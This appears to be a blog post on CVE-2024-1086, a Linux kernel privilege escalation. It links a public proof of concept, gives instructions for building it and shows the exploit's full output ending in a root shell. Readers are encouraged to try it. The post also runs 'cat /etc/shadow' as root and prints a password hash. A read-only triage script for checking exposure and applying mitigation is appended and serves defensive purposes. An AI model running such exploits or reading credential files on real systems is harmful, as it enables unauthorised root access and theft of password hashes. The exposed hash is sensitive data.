This is CVE-2024-1086, a Linux kernel local privilege escalation. It gives an unprivileged user a root prompt without requiring a password, and it works as well as advertised.
Clone the repository and run make to build the proof of concept: https://github.com/Notselwyn/CVE-2024-1086.git.
(jcartwright@2403-4800-25af-b00--2) 192.168.1.5 CVE-2024-1086 $ ./exploit
[*] creating user namespace (CLONE_NEWUSER)...
[*] creating network namespace (CLONE_NEWNET)...
[*] setting up UID namespace...
[*] configuring localhost in namespace...
[*] setting up nftables...
[+] running normal privesc
[*] waiting for the calm before the storm...
[*] sending double free buffer packet...
[*] spraying 16000 pte's...
[*] checking 16000 sprayed pte's for overlap...
[+] confirmed double alloc PMD/PTE
[+] found possible physical kernel base: 00000002c0200000
[+] verified modprobe_path/usermodehelper_path: 00000002c1e5f840 ('/sanitycheck')...
[*] overwriting path with PIDs in range 0->4194304...]
/bin/sh: 0: can't access TTY; job control turned off.
#
This is very easy to do, and the exploit gave me a genuine root prompt.
# cat /etc/shadow | head -n 1
root:$6$/lIOyMuIf.xwY7oM$mH.FZ7iptq5oUZnLa75Hqis5FI//N/KjQ0iRqoSl5PmRV4Jfwd4cphgtwCrrJsPlTqZZ2rCK4.maD4cdB4zpC/::0:99999:7:::
This was run on the following kernel version; the exploit also works on kernels up to 6.6:
5.14.0-362.24.1.el9_3.x86_64+
This is a very interesting Linux exploit: it does not require root access, and it is worth trying on a Linux PC to see how easily it yields superuser access.
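As an added example (my own triage script, not code from the post or from the PoC repository), the POSIX shell below checks a host against the three preconditions the exploit output above makes visible: a kernel in the 5.14 to 6.6 window the post reports, the ability of an unprivileged user to create a user namespace, and a loadable nf_tables module. The 5.14..6.6 window is taken from the post, and the sysctl and modprobe.d locations are standard Linux paths assumed here; anything outside that window should be checked against your vendor advisory rather than treated as safe.

```shell
#!/bin/sh
# Exposure triage for CVE-2024-1086 (added example; assumptions noted inline).

# Exit 0 when MAJOR.MINOR of a kernel release string lies in 5.14..6.6,
# the window the post reports the PoC working on (assumed, not exhaustive).
in_reported_range() {
    rel="$1"; major=${rel%%.*}; rest=${rel#*.}
    minor=${rest%%.*}; minor=${minor%%-*}
    case "$major" in
        5) [ "$minor" -ge 14 ] ;;
        6) [ "$minor" -le 6 ] ;;
        *) return 1 ;;
    esac
}

# Exit 0 when a modprobe.d directory hard-blocks nf_tables.  Only the
# "install nf_tables /bin/false|true" form counts: a bare "blacklist" line
# stops alias autoloading only, not an explicit load.
nf_tables_blocked_in() {
    grep -Eqs '^[[:space:]]*install[[:space:]]+nf_tables[[:space:]]+/bin/(false|true)' "$1"/*.conf
}

# Exit 0 when an unprivileged user can create a user namespace, which is
# the PoC's very first step ("creating user namespace (CLONE_NEWUSER)").
userns_unprivileged_allowed() {
    [ -r /proc/sys/user/max_user_namespaces ] || return 1
    [ "$(cat /proc/sys/user/max_user_namespaces)" -gt 0 ] || return 1
    # Debian/Ubuntu-specific knob; absent on RHEL kernels such as the one in the post.
    if [ -r /proc/sys/kernel/unprivileged_userns_clone ]; then
        [ "$(cat /proc/sys/kernel/unprivileged_userns_clone)" = 1 ] || return 1
    fi
    return 0
}

triage() {
    rel=$(uname -r)
    if in_reported_range "$rel"; then echo "kernel $rel: inside the range the post reports as exploitable"
    else echo "kernel $rel: outside that range (check the vendor advisory)"; fi
    if userns_unprivileged_allowed; then echo "unprivileged user namespaces: allowed"
    else echo "unprivileged user namespaces: restricted"; fi
    if nf_tables_blocked_in /etc/modprobe.d; then echo "nf_tables: blocked via modprobe.d"
    else echo "nf_tables: loadable (if unused, add 'install nf_tables /bin/false' under /etc/modprobe.d)"; fi
}

triage
```

Run it as any user; all three checks are read-only, and the modprobe.d mitigation it suggests only makes sense on hosts that do not use nftables.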
Read the very long blog post documenting exactly how this works and how the exploit was found.